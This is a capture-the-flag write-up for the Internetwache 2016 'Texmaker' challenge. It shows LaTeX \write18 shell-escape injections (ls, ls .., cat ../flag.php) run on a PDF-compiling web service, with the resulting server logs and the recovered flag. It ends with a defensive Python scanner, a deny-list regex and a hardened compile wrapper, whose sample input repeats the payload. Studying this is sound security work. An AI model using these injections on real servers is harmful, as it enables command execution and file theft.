[Internetwache CTF 2016] [Web 90 – Texmaker] Write Up

Description

Creating and using corporate templates is sometimes really hard. Luckily, we have a web interface for creating PDF files. Some people doubt it's secure, but I reviewed the whole code and did not find any flaws.

Service: https://texmaker.ctf.internetwache.org

Resolution

This one wasn't really difficult. The only thing is that we needed to know a bit of LaTeX… or how to look for it on Google 🙂

The website was simple: we only had a form in which we could put some LaTeX commands and submit them. The script then compiled the PDF, showed us the log output, and let us download the PDF if we wanted. Obviously, the goal was to find a way to read files on the server.


As we didn't really know LaTeX, we did a bit of googling to see which commands were available, and we found this one: \immediate\write18{<command>}. It runs <command> through the system shell, provided the compiler was started with shell escape enabled.

Of course, our first try was to list the current directory by putting "\immediate\write18{ls}" in the form. The log output was as follows:

LOG:
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) (preloaded format=pdflatex)
 \write18 enabled.
entering extended mode
(./f9087fcce6fe3eb35c3c2a45a4afabb6.tex
LaTeX2e <2014/05/01>
Babel <3.9l> and hyphenation patterns for 2 languages loaded.
(/usr/share/texlive/texmf-dist/tex/latex/base/article.cls
Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo))
(/usr/share/texlive/texmf-dist/tex/latex/base/inputenc.sty
[...]
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvdefinekeys.sty))
(/usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvsetkeys.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/etexcmds.sty)))
(/usr/share/texlive/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))01839870459db1adf8c50bf11ec25c05.aux
01839870459db1adf8c50bf11ec25c05.log
01839870459db1adf8c50bf11ec25c05.tex
1877610afd71aacdde122cb19f21f905.aux
1877610afd71aacdde122cb19f21f905.log
1877610afd71aacdde122cb19f21f905.tex
[...]
f55b7e1932bc05ee368d447a3230181e.log
f55b7e1932bc05ee368d447a3230181e.tex
f6d3e7d822c533e39d7c6718911fb423.bbl
f6d3e7d822c533e39d7c6718911fb423.blg
f9087fcce6fe3eb35c3c2a45a4afabb6.aux
f9087fcce6fe3eb35c3c2a45a4afabb6.log
f9087fcce6fe3eb35c3c2a45a4afabb6.tex
foo
foo.pdf
hehe.aux
hogemyhoge
hoo2i.php
hooi
hooi.php
hooi2.php
huehuehue.txt
huehuehue.txt.aux
myhogehoge
out.txt
script.tex
scriptoutput.tex
test.pdf
this_333_a.txt
tmpdate.tex
xd
xd.pdf

It worked like a charm 🙂 The " \write18 enabled." line near the top of the log confirms that the server was running pdfTeX with shell escape switched on.
But the flag was not here: there were only log outputs and PDF files. We then tried to list the parent directory by sending the "\immediate\write18{ls ..}" command. Here is the log output:

LOG:
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) (preloaded format=pdflatex)
 \write18 enabled.
entering extended mode
(./2a1d5d01482b94ce7bdbe8dde57d6601.tex
LaTeX2e <2014/05/01>
Babel <3.9l> and hyphenation patterns for 2 languages loaded.
(/usr/share/texlive/texmf-dist/tex/latex/base/article.cls
Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo))
[...]
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvdefinekeys.sty))
(/usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvsetkeys.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/etexcmds.sty)))
(/usr/share/texlive/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))ajax.php
assets
cleanpdfdir.sh
compile
config.php
config.php.sample
flag.php
index.php
pdf
templates

(./2a1d5d01482b94ce7bdbe8dde57d6601.aux) )
No pages of output.
Transcript written on 2a1d5d01482b94ce7bdbe8dde57d6601.log.

So, here is our flag file 🙂 We now just have to find a way to read it. Easy 🙂 We just sent the "\immediate\write18{cat ../flag.php}" command, and…

LOG:
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) (preloaded format=pdflatex)
 \write18 enabled.
entering extended mode
(./e8f6988c1c71e92856fa1657100ce7aa.tex
LaTeX2e <2014/05/01>
Babel <3.9l> and hyphenation patterns for 2 languages loaded.
(/usr/share/texlive/texmf-dist/tex/latex/base/article.cls
Document Class: article 2014/09/29 v1.4h Standard LaTeX document class
(/usr/share/texlive/texmf-dist/tex/latex/base/size10.clo))
(/usr/share/texlive/texmf-dist/tex/latex/base/inputenc.sty
(/usr/share/texlive/texmf-dist/tex/latex/base/latin1.def))
[...]
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvdefinekeys.sty))
(/usr/share/texlive/texmf-dist/tex/latex/oberdiek/kvoptions.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/kvsetkeys.sty
(/usr/share/texlive/texmf-dist/tex/generic/oberdiek/etexcmds.sty)))
(/usr/share/texlive/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))<?php

$FLAG = "IW{L4T3x_IS_Tur1ng_c0mpl3te}";
?>

(./e8f6988c1c71e92856fa1657100ce7aa.aux) )
No pages of output.
Transcript written on e8f6988c1c71e92856fa1657100ce7aa.log.

The flag.php file had been read by our cat command, and its contents were echoed straight into the compilation log shown to us.

Flag was IW{L4T3x_IS_Tur1ng_c0mpl3te}
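The root cause here is not LaTeX itself but running pdfTeX on untrusted input with unrestricted shell escape. The following helpers, added to this write-up as an illustration (they are not part of the challenge's code), show the checks a service like this one should have had: a scanner that flags \write18 and file-reading primitives in a submission, a parser for the "\write18 enabled." banner line that the log above exposes, and a compile wrapper that passes -no-shell-escape, sets kpathsea's openin_any=p (paranoid mode, which refuses files outside the working tree) and runs in a throwaway directory. The sample submission and log excerpts are constructed; the hostname-reading \input line is there only to exercise the scanner.

```python
"""Defensive helpers for a web service that compiles user-supplied LaTeX (illustrative)."""
import re
import subprocess
import tempfile
from pathlib import Path

# \write18 is the shell-escape primitive used in the write-up; the second group
# covers the common ways a document can pull arbitrary files into the log or PDF.
SHELL_ESCAPE_RE = re.compile(r"\\write\s*18\b")
FILE_ACCESS_RE = re.compile(
    r"\\(input|include|openin|InputIfFileExists|lstinputlisting|verbatiminput)\b"
)


def scan_latex_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, primitive) for every risky control sequence in the source."""
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        # Drop TeX comments (an unescaped % to end of line) so commented-out text is inert.
        code = re.sub(r"(?<!\\)%.*$", "", line)
        for _ in SHELL_ESCAPE_RE.finditer(code):
            findings.append((n, "write18"))
        for m in FILE_ACCESS_RE.finditer(code):
            findings.append((n, m.group(1)))
    return findings


def shell_escape_state(log_text: str) -> str:
    """Read pdfTeX's banner: 'enabled' (full shell), 'restricted' (allow-list) or 'disabled'."""
    for line in log_text.splitlines():
        s = line.strip()
        if s == "restricted \\write18 enabled.":
            return "restricted"
        if s == "\\write18 enabled.":
            return "enabled"
        if s == "\\write18 disabled.":
            return "disabled"
    return "unknown"


def pdflatex_argv(tex_name: str, workdir: Path) -> list[str]:
    """Command line for a hardened compile: shell escape off, no interactive prompts."""
    return [
        "pdflatex",
        "-no-shell-escape",
        "-interaction=nonstopmode",
        "-halt-on-error",
        "-output-directory", str(workdir),
        tex_name,
    ]


def compile_untrusted(source: str, timeout: int = 20):
    """Refuse flagged input, then compile in a fresh temp dir with shell escape disabled.

    Requires a local pdflatex; returns (returncode, log, pdf_bytes_or_None).
    """
    findings = scan_latex_source(source)
    if findings:
        raise ValueError(f"refusing to compile, risky primitives at: {findings}")
    with tempfile.TemporaryDirectory() as d:
        work = Path(d)
        (work / "job.tex").write_text(source, encoding="utf-8")
        # Minimal environment; openin_any=p is honoured by kpathsea from the environment
        # and stops \input and friends from opening files outside the job directory.
        env = {"PATH": "/usr/bin:/bin", "HOME": d, "openin_any": "p"}
        proc = subprocess.run(
            pdflatex_argv("job.tex", work), cwd=work, env=env,
            capture_output=True, text=True, timeout=timeout,
        )
        # Belt and braces: verify from the log that the binary really ran without shell escape.
        if shell_escape_state(proc.stdout) != "disabled":
            raise RuntimeError("pdflatex did not report \\write18 disabled; check texmf.cnf")
        pdf = work / "job.pdf"
        return proc.returncode, proc.stdout, (pdf.read_bytes() if pdf.exists() else None)


# Constructed sample submission modelled on the payload from the write-up.
SAMPLE_SUBMISSION = r"""\documentclass{article}
\begin{document}
\immediate\write18{cat ../flag.php}
% \write18{ls} inside a comment never runs
\input{/etc/hostname}
Hello
\end{document}
"""

# Constructed log excerpts: the first mirrors the banner seen in the challenge logs.
LOG_VULNERABLE = "This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian)\n \\write18 enabled.\nentering extended mode\n"
LOG_HARDENED = "This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian)\n \\write18 disabled.\nentering extended mode\n"

if __name__ == "__main__":
    print(scan_latex_source(SAMPLE_SUBMISSION))
    print(shell_escape_state(LOG_VULNERABLE), shell_escape_state(LOG_HARDENED))
    print(" ".join(pdflatex_argv("job.tex", Path("/tmp/job"))))
```

The scanner is a defence-in-depth layer, not the fix: TeX can build control sequences at runtime, so a deny-list will always miss something. The part that actually closes the hole is -no-shell-escape (or shell_escape = f in texmf.cnf) together with openin_any=p and running the compiler as an unprivileged user in an isolated directory; checking the banner line afterwards catches a misconfigured build that silently re-enabled shell escape.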


Enjoy

The lsd
